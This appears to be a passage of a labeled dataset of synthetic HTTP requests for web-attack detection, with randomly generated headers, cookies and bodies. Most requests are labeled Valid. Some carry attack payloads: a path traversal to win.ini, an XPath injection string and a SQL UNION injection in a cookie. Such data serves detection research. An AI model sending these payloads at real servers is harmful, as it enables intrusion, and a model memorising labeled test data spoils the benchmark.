Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 117.10.196.6
Cookie: ne0i8il8nfiIj6g=ul55odaeZg;hdrteestco4npei=7864484;ebek3od4=kTDnK._J;mnsdpsYre=deleteextermd<meg ]&j66qm
Cookie2: $Version="70"
Date: Sat, 04 Dec 04 18:46:47 UTC
ETag: W/"kcQq-97mGk7WVeND3ug"
Expect: 100-continue
From: ee1e@sacey.de
If-Modified-Since: Wed, 10 Sep 08 21:06:50 UTC
If-Unmodified-Since: Fri, 08 Jun 07 04:50:45 GMT
If-Match: *
If-None-Match: "pnYK21Tvs2hrbYv"
If-Range: Sun, 06 Feb 05 09:52:00 GMT
Max-Forwards: 4
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Tlld muno=taet
Authorization: Digest cnonce="9Nlhaaeo"
Range: 72-79
Referer: http://0lUsstle.be/ssaee/yssean.php3
TE: chunked;q=0.8,deflate
Trailer: Via
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 5.9; wi-hc; rv:7.4.3) Gecko/16027173
UA-CPU: x86
UA-Disp: 1147,7434,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: FTP/8.9 74.214.38.234
Transfer-Encoding: aunh; Sauimfyl=n7oaou
Upgrade: obxu/3.0
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 194.234.50.19
X-Serial-Number: 63866719
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18478
Start - Id: 29794
class: Valid
GET /pn.png?TcinputQ5@=t1esi%29e%3E&ir5iiklye=dugsra&eea6hr8rntioas=xqpaht4osdhrPE0lo&ye4S=hb-nX%24qpt&sfeoh3itAebO=wgetvgi&4bodmtvr3=2708&my=s HTTP/1.1
Host: www.lmpaeiddre.gov
Connection: close
Accept: audio/*;q=0.6, audio/*;q=0.6
Accept-Charset: koi8;q=0.5, windows-874;q=0.5, x-mac-chinesetrad;q=0.5, iso-8859-1;q=0.7, windows-1254
Accept-Encoding: 
Accept-Language: pUioe-akafd;q=0.3
Cache-Control: no-cache
Client-ip: 107.22.205.177
Cookie: l35t=Iphh;HmBezGGf=5;eAttndl=2142605;oTv59st=2;Uwt=f
Cookie2: $Version="92"
Date: Fri, 18 Mar 05 10:41:55 GMT
ETag: "hPpIiMmM7JTv93r0P"
Expect: 100-continue
From: ouiean@taluth.it
If-Modified-Since: Tue, 29 Nov 05 01:22:35 UTC
If-Unmodified-Since: Thu, 24 Nov 05 03:09:07 GMT
If-Match: "LB_LmUPZ_oBTTGi7GR"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: aohsg ns1ea=ddEe6l
Authorization: Digest cnonce="mSep96"
Range: -192,85376-41938,2-
Referer: /genedS/hVkil2e.asmx
TE: trailers,gzip;q=0.1,trailers
Trailer: Trailer
User-Agent: Mozilla/6.6 (X11; U; Linux i586 4.6; ay-Ur; rv:8.9.8) Gecko/57516738
UA-CPU: Sparc
UA-Disp: 793,154,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2347x796
Via: arehbt/2.7 150.232.177.222, 1.0 www.anpM.jpg, 5.9 www.regen.js
Transfer-Encoding: afI3do; asodovy=eoSTEe
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 671 www.dhevPk.tiff "ytaet" "Wed, 23 Dec 09 23:58:59 CET"
X-Forwarded-For: 7.71.153.105
X-Serial-Number: 9258897383132
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 29794
Start - Id: 36211
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: 117.216.73.214
Connection: exedllt
Accept: audio/*;q=0.4, video/quicktime
Accept-Charset: cp-936;q=0.0, iso-8859-8;q=0.7, euc-jp;q=0.5, iso-8859-4;q=0.8, iso-8859-1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 57.19.106.255
Cookie: 8t3=liuatRehoc6eN;HKQYVbinb-kAP=3305;mn5via=1;DFQPV=knoderughhCsaaajl;oTcr=6081375
Cookie2: $Version="32"
Date: Tue, 04 Apr 06 09:15:17 CET
ETag: "GO2S.faufqbFl7gf_ODS"
Expect: ctcvplr
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Match: *
If-None-Match: *
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 183
MIME-Version: 3.7
Pragma: a1i=e
Proxy-Authorization: Digest realm
Authorization: Basic ZGhvbjpuZHRmcno=
Range: 183-
Referer: /soomapn/Tt2h/hilg/i4pweaea.wav
TE: trailers
Trailer: Accept-Language
User-Agent: onytoeswmalit54wnue
UA-Disp: 5541,8015,16
UA-OS: Win98
Via: 7.0 124.150.160.142, FTP/1.0 162.249.68.178, 1.0 22.82.91.231:088
Upgrade: sst2oo/6.7, eatt/1.0
X-Serial-Number: 003494109

null

End - Id: 36211
Start - Id: 41
class: Valid
GET /olrs8Efs0e/m51qA4imGzYGk2cZGaN/ajZIh3tTpm6Ug7jsu/c7Xnl0S/fhvKd6z1vdJv0oj/5t8DYfL/nebnlcoalaaERee652.png?he15s0tp9o2iflk=seNtoqd&rtd=8841&9SkG9f8imginsert=289083&reeo0heT2reaLu=287914&GzI5qDJd=009177573&oxnflvt9gg2aoe=7&i2d=631492&ferIi8pRhesn0i=80706211&baheGiOeunal=%401&omdiahs4nw0ohgr=1O.a4&8olrhhn0o3tteKo=31&xY5acceptcmdEallbRBIvbscript=taeexha%3E+%7Cvoseh40&tpoi=n%24%3D HTTP/1.1
Host: 175.47.56.83:80
Connection: keep-alive
Accept: text/xml, audio/*
Accept-Charset: *
Accept-Encoding: identity;q=0.2, compress, compress, gzip;q=0.4
Accept-Language: e-iHu;q=0.8, f-v
Cache-Control: max-stale
Client-ip: 155.190.182.111
Cookie: taddrOcxytsetD=803;ysoUeSi=94057
Cookie2: $Version="3"
Date: Tue, 20 Nov 07 12:10:46 CET
ETag: W/"txendMFnsxCj7AS8"
Expect: 100-continue
From: T11b@lathr.st
If-Modified-Since: Sun, 18 Feb 07 21:33:25 CET
If-Unmodified-Since: Sun, 09 Nov 08 22:24:40 GMT
If-Match: "@Af-u8gJq.Ffs@wlaS"
If-None-Match: *
If-Range: Wed, 17 Mar 10 01:19:41 UTC
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: NTLM Y3oyaEVoaWkzcll5bnZ0ZXV0ZWRvYWQ4aWVtdGRXZ24yZXRvMm9tbkU=
Range: -54670
Referer: /dytteer/f0uanruL.sh
TE: gzip,trailers
Trailer: From
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 6.6; tD-es; rv:0.3.5) Gecko/29961892
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: 9.3 249.7.13.238
Transfer-Encoding: gzip
Upgrade: ntyhts/3.8
Warning: 232 www.AlaosaP.html "peaiso" "Tue, 27 Oct 09 21:12:39 CET"
X-Forwarded-For: 242.13.127.96
X-Serial-Number: 436492
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41
Start - Id: 5995
class: Valid
PUT /iarmfanrhte/mtaoiusp5ibv9lcaRtl/mWG7F/qi/ecetEt4h/Dnrath/sbenu/ahDEANfAfCrLJcaksB.exe? HTTP/1.0
Content-Length: 162
Content-Language: tnGj,N,tedr
Content-Encoding: gzip
Content-Location: http://www.noih.net/dpse/4imm/leoNod/sinolUin.js
Content-MD5: ZXR5UmhzcDR3OG9teDdobw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Sep 05 02:18:53 GMT
Last-Modified: Wed, 09 Nov 05 05:52:44 CET
Host: 172.110.46.225
Connection: eFo9ljg
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: T-0aast, o5ua4h-rujare;q=0.2
Cache-Control: only-if-cached
Client-ip: 155.32.218.110
Cookie: 26fl=96079;aqutzsohcve=gssm>mhljc
Cookie2: $Version="00"
Date: Thu, 28 May 09 01:19:12 CET
ETag: "Ty3W1LQhsbePo4aDzm"
Expect: 100-continue
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Mon, 24 Jan 05 03:12:26 UTC
If-Unmodified-Since: Sun, 11 Jul 04 15:18:59 UTC
If-Match: *
If-None-Match: "HvW.I.FMM6vif35CiW"
If-Range: "AO1rGgN3YORHwWK3SXj"
Max-Forwards: 8
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: ueyia tnem=hshmu4l
Authorization: Basic dGVldHdybjk6eWllbWhhb0k=
Range: 7772-71595
Referer: /ilNel/ojarae.dll
TE: trailers,trailers,deflate
Trailer: Warning
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 5.3; c8-la; rv:1.3.8) Gecko/01579643
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3062x279
Via: 1.9 www.oiytea.jpeg, HTTP/1.7 www.GgwrM.css:3443
Transfer-Encoding: compress
Upgrade: yseo3t/0.7, ihmnhr/4.6, dtadr/0.4
Warning: 330 www.Oteemon.tiff:442 "eenlria" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 381725681
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

rosane8=EScml>;pdeaont &a3xllecitiuis= fnsunion8cUetlgsna&0usthnhh0dorenn=Oh4xeahee8n&nhtFntbprf=srisAegtsongh&0d0xp_lqPvbscripts=woogAaecpsc]rtaomaihtacces

End - Id: 5995
Start - Id: 26241
class: Valid
GET /9T.UY_2V6Q/7bg6gPW7ZMWWX/tRno/hitvasehsor/wacarta1mtxawtdl/CAnmm6oumeDTDrfOe.htm?aefwnolaebit=36986&aus2=bXzhXySbLVwE&U4owp-Jbgsound6fromCFM=fbnfew&hm2lTtrgldeoieY=9Ho&onIyt5lu=oiFo&lneE3aOaT4=llmerixho93sn&.p7.pgSXtC=2631&reorirhsoaga=mg&lIr2k=kfwnisoateetesgh&f6eereDEhm=9cDEoZi HTTP/1.0
Host: 234.16.63.92
Connection: ee9Ml
Accept: application/rtf;q=0.9, image/*;q=0.0, video/*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate, gzip;q=0.8, deflate
Accept-Language: h4p-9eeosmp, 4n-l;q=0.6, nd-ro;q=0.1
Cache-Control: a3zifnm='e'
Client-ip: 196.161.77.5
Cookie: vihm=lsi+;tu=t@QKO
Cookie2: $Version="197"
Date: Sat, 23 Sep 06 24:40:08 CET
ETag: W/"vdWWqXtR9BrkiOmHa"
Expect: 100-continue
From: scire@l29NotOrdn.be
If-Modified-Since: Sat, 23 May 09 19:27:05 GMT
If-Unmodified-Since: Sat, 11 Oct 08 20:24:39 CET
If-Match: "5W8zPE0xMheihdu"
If-None-Match: *
If-Range: Sat, 23 Sep 06 10:19:43 UTC
Max-Forwards: 272
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: oSeN utuitr=sewWq
Range: 47781-
Referer: /atIi/Ertonh.asmx
TE: trailers,gzip;q=0.4
Trailer: Warning
User-Agent: m641EQU4lq http://www.ocadd.it
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 539x1733
Via: FTP/3.9 151.95.120.35, 5.1 174.3.36.47:695, 2.8 www.QerdoO.shtml:82046
Transfer-Encoding: onei
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 942 www.roe5.js "9fTnaE3ws2" 
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26241
Start - Id: 19017
class: Valid
GET /rNb7xEnGFgw2R-4oTbx/oleScesnPd5ve1lfa/up2h3WF/7Srhjmfdsveio/n-1XjXac-D6kAVuJ/rf0tehoans.nsf?HteIsyt=caea&ttszlpe9bluntn=9447515&GTEn2aqtapndet=eelinkSvhopasswdetch&Ca20zPIX=se&rn8eDat1nesao7e=lNxlb&queioadt7a=%2Besng&robt7Inr7=ro6t&ormnq=nclDGi&Nian=28&ntdovrss=9861795109&utsRtn0Aeokancn=29254104 HTTP/1.0
Host: www.ye5ni.de:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-6;q=0.7, isiri-3342
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-age=61
Client-ip: 203.235.99.136
Cookie: eie=emJPqa1
Cookie2: $Version="62"
Date: Thu, 12 Feb 09 02:47:36 UTC
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: Priuift@eiTp29Uz.ch
If-Modified-Since: Thu, 19 Jan 06 22:07:01 CET
If-Unmodified-Since: Tue, 06 Nov 07 20:28:58 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Aug 08 07:57:47 UTC
Max-Forwards: 3
MIME-Version: 8.1
Pragma: ldezo=mH
Proxy-Authorization: s4dHh n7hsa=euolh8g
Authorization: Basic Z1JudGM6ZTl5YQ==
Range: 002-0467,62-
Referer: http://rnnMrHnt.org/arilT/lfpnci/l3iwdtm/esi2e/cbcpsn.wmn
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/7.2 (X11; U; Solaris 0.1; ra-kw; rv:1.2.6) Gecko/55561129
UA-CPU: MIPS
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: 5.4 185.93.218.93, 6.3 www.haye.jpg, 7.9 6.21.138.251
Transfer-Encoding: deflate
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 763 www.etbGe1.js "ot6snleog4Ao3avndro" "Mon, 18 Jun 07 08:21:39 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19017
Start - Id: 6931
class: Valid
POST /fk5j/khpd_g5zSOG7c7x/OfCg-85ygUJFtU/hlaao/e-.sh? HTTP/1.1
Content-Length: 239
Content-Language: R,nehotCln,lese
Content-Encoding: compress
Content-Location: http://sroci.gov/r9os/aiomsed3.dll
Content-MD5: OW5zcnJtaXZSZmVubnZ0Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 01:28:22 GMT
Last-Modified: Sun, 01 Oct 06 02:18:32 CET
Host: www.mtnrmwnea.de:80
Connection: smti
Accept: */*
Accept-Charset: x-mac-turkish;q=0.1, windows-874;q=0.9, euc-cn;q=0.0, iso-10646-ucs-2, windows-1251
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 182.144.239.94
Cookie: oescD5i=snsihttpil mlNlaiB;sthtoi=5;ymdrzvoEookuuah=3
Cookie2: $Version="502"
Date: Sat, 24 Sep 05 15:51:10 UTC
ETag: W/"CYnNNC4LyklP_w2CkJg-"
Expect: a7cnsma=bhd8fwt
From: 9tasgo@r6haat.org
If-Modified-Since: Wed, 07 Apr 10 15:38:02 CET
If-Unmodified-Since: Wed, 10 Nov 04 16:34:09 CET
If-Match: "dhlclUEWeVOZimW"
If-None-Match: *
If-Range: Mon, 22 Oct 07 22:29:50 UTC
Max-Forwards: 15
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: obntn ETroq=muk2
Authorization: Basic YWVudHczOmJmaWFpdXNl
Range: -35,310954-4,-65030
Referer: http://cenUtl.gov/cnsTi/oesex/5tioo/anolCm.conf
TE: trailers
Trailer: From
User-Agent: osuSceirnia
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9121x8354
Via: HTTP/9.1 212.73.118.26, 5.5 www.r3tis8r.jpg
Transfer-Encoding: identity
Upgrade: eRoin/5.2, vsm/1.5, to6a/3.8, h0t/3.0
Warning: 880 15.65.185.191:9612 "olozrth" "Tue, 18 Jan 05 16:43:51 GMT"
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 311516057491
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

x2r5j=80$=lteess&Q_Wxp_VUV=encddthcjee&0UEmI=cwEtea0gsllte2zr&ahY=hdp9hha7sNeuhy&B1DxF=uIhJki&9vrfw=sObqy7&koeWstqnetks=gwinnt~e<rhu rendm-(4$p&youcrseotnadOt=s1meAa8t$iobject&O08byFj=enrle90emdijimhc&malbsi=ebodyhtolleceahrd

End - Id: 6931
Start - Id: 35745
class: XPathInjection
GET /6D6ck6zb7kKbjL/aK-j@B/deEKMZCFZyIsKdowx5/boaem/aaVhzif4eEothxhsnh2i.htm?2Q0d4Zk91qGo=924++or+1%3C+++is%2FerlrOs%2Fv%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D285%5D++or+++53%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&rtAm2ed=ffChTnm7E9&rxrzOphewmlsRi9=784 HTTP/1.1
Host: www.rv6Fmnel.be:80
Connection: eee1
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, compress;q=0.5, compress;q=0.3, deflate
Accept-Language: *
Cache-Control: min-fresh=50
Client-ip: 238.94.180.138
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="615"
Date: Mon, 05 Dec 05 02:13:58 CET
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: T5icshho@0Oledom8.gov
If-Modified-Since: Sun, 21 May 06 24:36:03 GMT
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: Thu, 15 Apr 10 10:13:58 UTC
Max-Forwards: 311
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Basic N2Vzb2hkOnQ0ZXNlZWE=
Range: 820401-
Referer: /seilhea.jpg
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/1.1 (compatible; MSIE 7.8; Windows NT; tsgirrOj; chcoi)
UA-CPU: x86
UA-Disp: 233,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.1 219.78.110.72, 6.7 www.an9t.png
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35745
Start - Id: 14411
class: Valid
GET /tbattiee79trneh/n3PaEgfT5P/iof1R7itve1V-PeX/m1T1EZoi.c28DOVHv/egfdR-HXCGXnhZINKffv/U@23lvD/ornh4ees/sgogh5ooTefx/sextTaap3rh/1BXup.mZiI2B/shaEbgr.htm?kesgxeo=aopt&mvir=Alboot.initrhpQfsobject&miifgAnts=3146806004&hg=1563293&ursjemrufKpsro=OehWQftjouer&gvbscriptYIWZVJf=701623 HTTP/1.1
Host: 64.9.65.129
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-8859-9;q=0.5, cp-936, x-mac-hebrew;q=0.5, big5;q=0.8, windows-1251
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: 08rb7Ihc='r'
Client-ip: 232.154.190.55
Cookie: C1iatutsomsFb=336;wv=lLmnta0ef;hDorU=921
Cookie2: $Version="69"
Date: Fri, 04 Dec 09 19:52:30 UTC
ETag: W/"0gcSGvE5foaK2fSTQ"
Expect: uruotj
From: Rt7eei@haruek9a0.st
If-Modified-Since: Sun, 06 Apr 08 24:21:06 GMT
If-Unmodified-Since: Tue, 02 Oct 07 09:23:36 GMT
If-Match: *
If-None-Match: "-MQURPsVCzXQJBvEF67."
If-Range: Tue, 11 Jan 05 01:13:57 GMT
Max-Forwards: 47
MIME-Version: 0.0
Pragma: m='n95zakna'
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: xdtau tda4=OtsEo3
Range: -5585
Referer: /teegK/dsuotse/AgsInqNt/ayv3Ae.cgi
TE: trailers,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.3 (Windows; U; WinNT 2.3; ao-0c; rv:2.7.5) Gecko/00709099
UA-CPU: StrongARM
UA-Disp: 769,941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: HTTP/6.4 www.1ppnanwp.tiff, HTTP/9.3 110.201.83.227
Transfer-Encoding: compress
Upgrade: ip2mmm/0.8, 5ngG/4.3, usbu/3.8
Warning: 995 www.tyeo.tiff "emterf" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14411
Start - Id: 26899
class: Valid
GET /rviKt5UEYSdbkW/mt5edOaunenavod9etEs/Vohz1TEq@R4Y/Kcxgj0O_59/tstt.cgi?m8j=znS&q3Pe=oTGVSKh9QMrN&surpo=eerXregltairohWcz&2rdapoauiomsC=93933085&hntisow1gze=arn&Znvk0O3zz2-=96Ee1me&hRSsdnrnosi=Ju%5D%5CHm&vace=iirvnyuoloiDonded&igrtndorVsxa=9458&VifUn2w=r0ssneit&nTnuxp_Jhttpss=nWxohimhe&drrhI6otah6dae=396&7fe=07110&fs=ebkU&XohuiAses=79 HTTP/1.0
Host: 206.130.172.204
Connection: hhblna
Accept: audio/x-wav, image/*, text/xml;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: oa3mis-aeekt;q=0.9, rrsza-3, eu-w8nepln
Cache-Control: max-age=6303
Client-ip: 78.144.191.50
Cookie: Xuyj4YjS1=45;e4eye=tlcfartt4uFni6E;egl2tl=connectk giT=;iesdrh=ktpNLi
Cookie2: $Version="6"
Date: Fri, 10 Feb 06 15:35:40 UTC
ETag: "FHruSA7J4GkPoDT"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Sat, 23 Feb 08 13:08:04 GMT
If-Unmodified-Since: Thu, 21 Feb 08 23:25:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 13 May 05 04:03:50 UTC
Max-Forwards: 7754
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: r2458w gcrmd3=dsee
Authorization: Basic bmFlb205OnNhdHRzbg==
Range: 0-,7-80207
Referer: http://www.Cijoe7.st/Ybei/eeanmm/htpsamx/ribrr/ah8Ay.shtml
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: Mozilla/0.6 (X11; U; SunOS sun4u 0.7; l7-ao; rv:1.8.1) Gecko/04759031
UA-CPU: Sparc
UA-Disp: 0480,6767,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0290x1154
Via: FTP/4.6 www.d0odStt.png
Transfer-Encoding: nosi
Upgrade: bsetmw/7.7
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 202.36.161.97
X-Serial-Number: 7606285950640498
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26899
Start - Id: 33948
class: Valid
POST /few/eVomRSfFnify/ltl/sd5/se/tnohHoKahsxmisd.htm? HTTP/1.1
Content-Length: 57
Content-Language: 6k,T
Content-Encoding: gzip
Content-Location: /oDeri/yhnl.cgi
Content-MD5: bGUwcmU3Q2hhaXdyc3RlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Sep 07 20:14:01 UTC
Last-Modified: Mon, 17 Oct 05 14:44:33 GMT
Host: www.r5lt.it
Connection: ttHg
Accept: */*;q=0.8
Accept-Charset: gb2312;q=0.4, iso-8859-5;q=0.0
Accept-Encoding: *
Accept-Language: tnr1ede-e0yThskq;q=0.7, pesi-gv, b-la, baek6aT-ar;q=0.7
Cache-Control: min-fresh=2
Client-ip: 213.9.245.91
Cookie: tnz=rhop6Er6c0r5nio4;ndhctlY=0nT;oiaeteor1mt=tmpacalyOassIjsj;xnseeua9=ihba7jncTpjinybtI
Cookie2: $Version="2"
Date: Sat, 12 Jan 08 06:51:44 UTC
ETag: W/"vb.6A@lBQnM-2Kkn2F6m"
Expect: oeynyv=axel
From: eobeo@7uuevefn.cz
If-Modified-Since: Sat, 06 Oct 07 04:59:01 GMT
If-Unmodified-Since: Tue, 14 Jun 05 20:10:03 UTC
If-Match: *
If-None-Match: "YAE04ji7O@RaWofl"
If-Range: "3V8iG.QRhb7i-et"
Max-Forwards: 333
MIME-Version: 4.7
Pragma: N='n'
Proxy-Authorization: NTLM bWVvZGRnZTZhZHRtc29wZXRhZmVlMnBub2xFbUEzc2l3ZXZldGVhYUE=
Authorization: NTLM dHNpZWFwQnlocXpmYWxzcmdhbWRPaXd0OHNvWWFhdHJzaHQzbHdidzQ=
Range: 50468-961,8583-3
Referer: /afmatq/hthrtslk.cgi
TE: gzip
Trailer: Referer
User-Agent: 7rraeronihshn
UA-CPU: MIPS
UA-Disp: 225,357,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9189x7964
Via: HTTP/2.0 www.aA86.jpeg, 8.2 www.kagr.jpeg, 8.3 www.Ufdok.css:896
Transfer-Encoding: compress
Upgrade: qieelu/3.4, EqncM/6.9, btrA/6.0, idP/4.3, Owse/7.1
Warning: 808 www.a11otqpd.js "ieErLxrlK" "Tue, 21 Oct 08 21:39:20 CET"
X-Forwarded-For: 13.4.190.16
X-Serial-Number: 33317815178377
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~

hsm=|iog=&c4er2vt=83&a1InwsZe5=timDszrri5lbNw2copyjin

End - Id: 33948
Start - Id: 41312
class: SqlInjection
GET /t1GEGVQfM8pYf-/LKGWoN/fhUxL/xQN7qZyM/uqenm/ewtsp72b7eDe/shdseo7m/enrweenqill.html?hkNivhU=1725637574 HTTP/1.0
Host: www.e7naote6rE.com
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.1, euc-kr;q=0.7, x-mac-roman, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 253.63.97.11
Cookie: ouhasmef9aHgdr=?eSspor(rvtiR;raatldt=aGV@l;qotsdtdlee=') UNION   ALL SELECT  481     FROM oTh   WHERE    ( ''    =  '
Cookie2: $Version="830"
Date: Thu, 22 Nov 07 14:53:15 UTC
ETag: W/"Ik9CeFFgt5u2AcRFM"
Expect: 100-continue
From: ueaeFah@isedattkdk.be
If-Modified-Since: Sat, 25 Nov 06 21:35:37 CET
If-Unmodified-Since: Sat, 25 Aug 07 03:20:28 CET
If-Match: "phNdOK6XvC.xxXVAXY"
If-None-Match: "JL3AbqFeCvdXD4_V-5"
If-Range: "R6GZx1XxrdBCWcbOE0T"
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest response="6194CAa6Ca7a4F3B82eAe24071229C1F"
Authorization: NTLM dHJhYWdocmFuaHhqbEE0UmF4dGNSMjVkckdlck50aGllaA==
Range: 3-1402,-33161,6-385
Referer: /mvtrt/exl3.conf
TE: trailers,deflate,gzip;q=0.0
User-Agent: cObcc (uKRdgRc-sl; jEugG7)
UA-CPU: 68000
UA-Disp: 925,428,8
UA-Color: color16
UA-Pixels: 187x5335
Via: HTTP/0.0 88.73.39.221
Transfer-Encoding: gzip
Upgrade: nncle/5.7, nIrl/7.7
Warning: 506 www.ahaarsa.jpg "smnu" 
X-Forwarded-For: 139.28.183.159
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41312
Start - Id: 5631
class: Valid
POST /eegygestlGlraonocaee/hTot0trx.shtml? HTTP/1.1
Content-Length: 34
Content-Language: 5vqe,rsdrltd,3nO
Content-Encoding: identity
Content-Location: /eteeoy.bin
Content-MD5: bHJ6dGx0dHJOZDlhb0VZbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 08:30:25 GMT
Last-Modified: Thu, 24 Nov 05 03:31:08 UTC
Host: 189.254.94.197:80
Connection: Etotaa
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: gbWni9ay-ldrb;q=0.5, d-m;q=0.7, orjt-9nerhar;q=0.7, l-aeaiUwct, latohs-latel;q=0.3
Cache-Control: no-cache
Client-ip: 108.68.217.111
Cookie: x8P_ZservicesCP4oe.=n04q9t
Cookie2: $Version="81"
Date: Wed, 14 Nov 07 16:05:32 UTC
ETag: W/"5_99s69o3YZTg9.dBwO"
Expect: oeq6LuA
From: rlateSh@n1q0eleet.be
If-Modified-Since: Tue, 15 Jul 08 22:38:21 UTC
If-Unmodified-Since: Sun, 18 Jul 04 16:38:26 GMT
If-Match: "PNuJmQ@mmiQtvvkRz"
If-None-Match: *
If-Range: Mon, 01 Dec 08 23:40:30 UTC
Max-Forwards: 909
MIME-Version: 9.8
Pragma: E=s
Proxy-Authorization: eoaot ubahyefg=7a5iI
